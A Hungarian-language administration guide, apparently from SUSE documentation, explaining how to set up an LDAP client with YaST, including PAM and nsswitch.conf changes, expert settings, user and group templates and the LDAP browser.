LDAP-kliens beállítása YaST segítségével

A YaST tartalmaz egy modult az LDAP alapú felhasználófelügyelet beállításához. Ha nem engedélyezi ezt a szolgáltatást a telepítés során, akkor indítsa el a modult a Hálózati szolgáltatások+LDAP-kliens menüpont kiválasztásával. A YaST automatikusan engedélyezi a PAM és NSS megfelelő módosításait, amelyekre az LDAP használatához szükség van és telepíti a szükséges fájlokat.
Szokásos eljárásSzokásos eljárás
Ahhoz, hogy megértsük, hogyan működik a YaST LDAP-kliensmodulja, ismerni kell a kliensgép háttérben működő folyamatait is. Ha az LDAP be lett kapcsolva a hálózati hitelesítéshez vagy a YaST-modul meghívásra került, akkor a rendszer telepítette a pam_ldap és az nss_ldap csomagot, és módosította a két vonatkozó konfigurációs fájlt. A pam_ldap a bejelentkezési folyamat és az LDAP-címtár – mint a hitelesítési adatok forrása – közötti egyeztetésért felelős PAM-modul. Telepítésre került a dedikált pam_ldap.so modul és megtörténtek a szükséges módosítások a PAM-konfiguráción (lásd: 35.2. példa - Az LDAP-hoz átalakított pam_unix2.conf).
35.2. példa - Az LDAP-hoz átalakított pam_unix2.conf
auth:       use_ldap
account:    use_ldap
password:   use_ldap
session:    none

Ha kézzel állít be további szolgáltatásokat az LDAP használatára, akkor adja meg a PAM LDAP-modult az /etc/pam.d könyvtárban, a szolgáltatásnak megfelelő a PAM konfigurációs fájlban. Az /usr/share/doc/packages/pam_ldap/pam.d/ könyvtárban találhatók bizonyos szolgáltatásokhoz már átalakított konfigurációs fájlok. Másolja át a megfelelő fájlokat az /etc/pam.d könyvtárba.
Az nsswitch mechanizmuson keresztüli glibc névfeloldás hozzá lett alakítva az LDAP használatához az nss_ldap segítségével. A csomag telepítése után egy új, megfelelően módosított nsswitch.conffájl jön létre az /etc könyvtárban. Az nsswitch.conf működésével kapcsolatban további információ: 30.6.1. szakasz - Konfigurációs fájlok. Az alábbi soroknak szerepelniük kell az nsswitch.conffájlban az LDAP-n keresztüli felhasználói adminisztrációhoz és hitelesítéshez. Lásd: 35.3. példa - Módosítások az nsswitch.conf fájlban.
35.3. példa - Módosítások az nsswitch.conf fájlban
passwd: compat
group: compat

passwd_compat: ldap
group_compat: ldap

Ezek a sorok először meghívják a glibc feloldó függvénytárát az /etc könyvtár megfelelő fájljainak kiértékeléséhez, valamint a hitelesítési és felhasználói adatok forrásaként elérik az LDAP-kiszolgálót is. Próbálja ki a mechanizmust például a felhasználói adatbázis elolvasásával, a getent passwd parancs segítségével. A visszaadott halmaznak tartalmaznia kell a rendszer helyi felhasználóinak, valamint az LDAP-kiszolgálón tárolt összes felhasználónak az adatait.
Annak megakadályozására, hogy az LDAP-n keresztül felügyelt felhasználók az ssh vagy login paranccsal bejelentkezzenek a kiszolgálóra, az /etc/passwd és az /etc/group fájlnak tartalmaznia kell egy további sort. Az /etc/passwd fájlban ez a sor a +::::::/sbin/nologin, az /etc/group fájlban pedig a +:::.
Az LDAP-kliens beállításaAz LDAP-kliens beállítása
Miután a YaST a szükséges módon módosította az nss_ldap, pam_ldap, /etc/passwd és /etc/group fájlt, egyszerűen csatlakoztathatja a klienst a kiszolgálóhoz, és hagyja, hogy a YaST LDAP-n keresztül felügyelje a felhasználókat. Az alapvető beállítás leírása: 35.3.2.1. szakasz - Alapkonfiguráció.
A YaST LDAP-kliens segítségével átalakíthatja a felhasználói és csoportadminisztrációra szolgáló YaST-modulokat. Ez magában foglalja az új felhasználók és csoportok alapértelmezett beállításainak, valamint a felhasználóhoz vagy csoporthoz rendelt attribútumok számának és viselkedésének módosítását. Az LDAP felhasználófelügyelet lényegesen több, másféle attribútumok hozzárendelését teszi lehetővé a felhasználókhoz és csoportokhoz, mint a hagyományos felhasználó- és csoportfelügyeleti megoldások. Ennek leírása: 35.3.2.2. szakasz - YaST csoport- és felhasználófelügyeleti moduljainak beállítása.
AlapkonfigurációAlapkonfiguráció
Az alap LDAP klienskonfiguráció párbeszédablak (35.2. ábra - YaST: LDAP-kliens beállítása) megjelenik a telepítés során, ha az LDAP felhasználófelügyeletet választja, vagy ha a telepített rendszeren kiválasztja a YaST vezérlőközpont Hálózati szolgáltatások+LDAP-kliens menüpontot.
35.2. ábra - YaST: LDAP-kliens beállítása


A gép felhasználóinak OpenLDAP-kiszolgálón történő hitelesítéséhez és az OpenLDAP-n keresztüli felhasználófelügyelet engedélyezéséhez tegye a következőket:
1. Az LDAP használatának engedélyezéséhez kattintson az LDAP használata lehetőségre. Ha LDAP-hitelesítést kíván használni, de nem szeretné, hogy más felhasználók bejelentkezzenek a kliensre, akkor válassza inkább az LDAP használata letiltott bejelentkezésekkel lehetőséget.
2. Adja meg a használandó LDAP-kiszolgáló IP-címét.
3. Az LDAP-kiszolgálón a keresési alap kiválasztásához adja meg az LDAP alap DN-t. Az alap DN automatikus lekéréséhez kattintson a DN lekérése menüpontra. A YaST ezután a fent megadott kiszolgálócímen LDAP-adatbázist keres. A YaST által biztosított keresési eredemények közül válassza ki a megfelelő alap DN-t.
4. Ha a kiszolgálóval TLS-sel vagy SSL-lel védett kommunikációt kíván kialakítani, akkor válassza ki az LDAP TLS/SSL lehetőséget.
5. Ha az LDAP-kiszolgáló továbbra LDAPv2-t használ, akkor explicit módon engedélyezze a protokollváltozat használatát az 2-es LDAP verzió lehetőség kiválasztásával.
6. Válassza ki az Az automounter aktiválása menüpontot a távoli könyvtárak - mint például a távolról felügyelt /home - felcsatolásához a kliensen.
7. Válassza ki a Saját könyvtár létrehozása bejelentkezéskor menüpontot, hogy a felhasználó saját könyvtára automatikusan létrejöjjön a felhasználó első bejelentkezésekor.
8. A beállítások alkalmazásához kattintson a Befejezés gombra.
35.3. ábra - YaST: Szakértői beállítás


A kiszolgáló adatainak módosításához adminisztrátor felhasználóként kattintson a Szakértői beállítások gombra. A következő párbeszédablak két részből áll: Lásd:35.3. ábra - YaST: Szakértői beállítás
1. A Kliensbeállítások lapon a következő beállításokat az igényeinek megfelelően adja meg:
a. Ha a felhasználók, jelszavak és csoportok keresési alapja eltér a LDAP alap DN részben megadott globális keresési alaptól, akkor itt adja meg ezeket az eltérő névkontextusokat a Felhasználó leképezése, Jelszó leképezése és Csoport leképezése mezőkben.
b. Adja meg a jelszómódosítási protokollt. A jelszóváltozásakor alkalmazandó szabványos metódus a crypt, ami azt jelenti, hogy a crypt által előálított jelszó hash értékek kerülnek felhasználásra. Ezzel és más beállításokkal kapcsolat részletekért tekintse meg a pam_ldap kézikönyvoldalt.
c. Adja meg a Csoporttag attribútum-hoz használandó LDAP-csoportot. Ennek alapértelmezett értéke a member.
2. A Felügyeleti beállítások menüpontban adja meg a következő beállításokat:
a. Adja meg a felhasználófelügyeleti adatok tárolásának alapját a Beállítás alap DN menüpontban.
b. Adja meg az Adminisztrátori DN megfelelő értékét. Ennek a DN-nek meg kell egyeznie az /etc/openldap/slapd.conf fájlban megadott rootdn értékkel annak engedélyezéséhez, hogy ez az adott felhasználó módosítani tudja az LDAP-kiszolgálón tárolt adatokat. Adja meg a teljes DN-t (például: cn=Administrator,dc=example,dc=com) vagy aktiválja a Alap DN hozzáfűzéselehetőséget ahhoz, hogy az alap DN automatikusan hozzáadásra kerüljön a cn=Administrator beírásakor.
c. Jelölje be az Alapértelmezett konfigurációs objektumok létrehozása lehetőséget az alap konfigurációs objektumok létrehozásához a kiszolgálón az LDAP-n keresztüli felhasználófelügyelet engedélyezéséhez.
d. Ha a kliensgépnek a saját könyvtárak fájlkiszolgálójaként kell működnie a hálózatban, akkor jelölje be a Saját könyvtárak ezen a gépen lehetőséget.
e. A Jelszóirányelv részben kiválaszthatja, hozzáadhatja, törölheti vagy módosítja a használandó jelszóirányelvet. A jelszóirányelvek YaST segítségével történő konfigurációja az LDAP-kiszolgálóbeállítás része.
f. Kattintson az Elfogadás gombra a Szakértői beállítás elhagyásához, majd a Befejezés gombra a beállítások alkalmazásához.
A Felhasználókezelési konfiguráció beállítása menüpont segítségével módosíthatja az LDAP-kiszolgáló bejegyzéseit. A kiszolgálón lévő konfigurációs modulok elérése a kiszolgálón tárolt ACL-ek és ACI-k szerint biztosított. Kövesse a következő eljárásokat: 35.3.2.2. szakasz - YaST csoport- és felhasználófelügyeleti moduljainak beállítása.
YaST csoport- és felhasználófelügyeleti moduljainak beállításaYaST csoport- és felhasználófelügyeleti moduljainak beállítása
A YaST LDAP-kliens segítségével a YaST modulok módosíthatók a felhasználó- és csoportfelügyelethez, valamint ezek szükség szerint kiterjeszthetők. Adjon meg sablonokat alapértelmezett értékekkel az egyéni attribútumokhoz az adatregisztráció egyszerűsítése érdekében. Az itt létrehozott előre megadott beállításokat az LDAP-címtár LDAP-objektumokként tárolja. A felhasználói adatok regisztrációja továbbra is a felhasználó- és csoportkezelésre szolgáló normál YaST modulokkal történik. A regisztrált adatok LDAP-objektumok formájában kerülnek tárolására a kiszolgálón.
35.4. ábra - YaST: modul beállítása


A modulkonfigurációhoz tartozó párbeszédablak (35.4. ábra - YaST: modul beállítása) lehetővé teszi új modulok létrehozását, a meglévő konfigurációs modulok kiválasztását és módosítását, valamint az ilyen modulok sablonjainak tervezését és módosítását.
Új konfigurációs modul létrehozásához tegye a következőket:
1. Kattintson az Új lehetőségre, és válassza ki a létrehozandó modul típusát. A felhasználói konfigurációs modulhoz válassza ki a suseuserconfiguration, a csoportkonfigurációhoz pedig a susegroupconfiguration lehetőséget.
2. Az új sablonhoz válasszon nevet. A tartalom nézetben ezután megjelenik egy táblázat, amelyben a modulban engedélyezett összes attribútum látható a hozzájuk rendelt értékekkel. Az összes beállított attribútumon túl a lista tartalmazza az aktuális séma által engedélyezett, de jelenleg nem használt egyéb attribútumokat is.
3. Fogadja el az előre beállított értékeket, vagy módosítsa a csoport- és felhasználókonfiguráció alapértelmezéseit: válassza ki a kívánt attribútumot, nyomja meg a Szerkesztés gombot, majd írja be az új értéket. A modul átnevezéséhez egyszerűen csak a modul cn attribútumát kell módosítani. A Törlés gomb megnyomására a jelenleg kiválasztott modul törlődik.
4. Az Elfogadás gomb megnyomása után az új modul bekerül a kiválasztás menübe.
A csoport- és felhasználóadminisztrációs YaST-modulok értelmes alapértékekkel kitöltött sablonokat tartalmaznak. Egy konfigurációs modulhoz rendelt sablon szerkesztése:
1. A Modul beállítása párbeszédablakban kattintson a Sablon beállítása menüpontra.
2. Igény szerint határozza meg a sablonhoz rendelt általános attribútumok értékeit. Üresen is hagyhat közülük néhányat. Az üres attribútumok törlődnek az LDAP-kiszolgálóról.
3. Módosítsa, törölje vagy vegye fel az új objektumok (az LDAP-címtárfa felhasználó- vagy csoportkonfigurációs objektumainak) új alapértelmezett értékeit.
35.5. ábra - YaST: Objektumsablon beállítása


Csatlakoztassa a sablont a moduljához: állítsa a modul susedefaulttemplate attribútumának értékét a módosított sablon DN-jére.
Az attribútum alapértelmezett értékei létrehozhatók másik attribútumokból is, ha abszolút érték használata helyett egy változót használ. Új felhasználó létrehozásakor például a cn=%sn %givenName automatikusan létrejön az sn és givenName attribútumértékéből.
Ha az összes modul és sablon megfelelően be van állítva és futásra kész, akkor a YaST segítségével az új csoportok és felhasználók a szokásos módon bejegyezhetők.

LDAP felhasználók és csoportok beállítása a YaST segítségévelLDAP felhasználók és csoportok beállítása a YaST segítségével
A felhasználói és csoportadatok tényleges regisztrációja alig különbözik az LDAP nélküli eljárástól. A következő rövid útmutató a felhasználók adminisztrációjával kapcsolatos. A csoportok adminisztrálásának folyamata hasonló.
1. A YaST felhasználói adminisztráció a Biztonság és felhasználók+Felhasználók létrehozása és módosítása menüponttal érhető el.
2. A Szűrő beállítása menüpont segítségével korlátozhatja a felhasználók nézetét az LDAP-felhasználókra és megadhatja a Root DN jelszavát.
3. Kattintson a Hozzáadása menüpontra és adja meg az új felhasználó konfigurációját. Megjelenik egy párbeszédablak négy lappal:
a. Adja meg a felhasználónevet, a bejelentkezési azonosítót és a jelszót a Felhasználói adatok lapon.
b. Tekintse meg a Részletek lapot az új felhasználó csoporttagságára, bejelentkezési parancsértelmezőjére és saját könyvtárára vonatkozóan. Szükség esetén módosítsa az alapértelmezéseket az igényeinek jobban megfelelő értékekre. Az alapértelmezett értékek, valamint a jelszóbeállítások értékei a következő leírt eljárással adhatók meg: 35.3.2.2. szakasz - YaST csoport- és felhasználófelügyeleti moduljainak beállítása.
c. Módosítsa vagy fogadja el az alapértelmezett Jelszóbeállításokat
d. Lépjen a Bővítőmodulok lapra, válassza ki az LDAP-bővítőmodult, majd kattintson az Indítás lehetőségre az új felhasználóhoz rendelt további LDAP attribútumok beállításához (lásd: 35.6. ábra - YaST: További LDAP-beállítások).
4. A beállítások alkalmazásához és a felhasználói beállítások elhagyásához kattintson az Elfogadás menüpontra.
35.6. ábra - YaST: További LDAP-beállítások


A felhasználófelügyelet kezdeti beviteli űrlapján találhatók LDAP beállítási lehetőségek. Itt meg lehet adni LDAP keresési szűrőket a meglévő felhasználók halmazára, valamint át lehet lépni az LDAP-felhasználók és csoportok beállítási moduljába a LDAP felhasználók és csoportok beállítása menüponttal.
Tallózás az LDAP-címtárfábanTallózás az LDAP-címtárfában
Az LDAP-címtárfa és az összes bejegyzésének kényelmes tallózásához használja a YaST LDAP-böngészőjét:
1. Jelentkezzen be root felhasználóként.
2. Válassza ki a YaST+Hálózati szolgáltatások+LDAP-böngésző menüpontot.
3. Adja meg az LDAP-kiszolgáló címét, az AdministratorDN-t, valamint a kiszolgáló RootDN-jéhez tartozó jelszót, ha a kiszolgálón tárolt adatokat olvasni és írni is szeretné.
Vagy válassza az Anonim hozzáférés lehetőséget, és ne adjon meg jelszót, ekkor csak olvashatja a címtárat.
Az LDAP-fa lap megjeleníti az LDAP-címtár tartalmát, amelyhez a gép csatlakozik. Az alelemek megjelenítéséhez kattintson a kívánt elemre.

http://sugo.ubuntu.hu/10.10/html/serverguide/hu/samba-ldap.html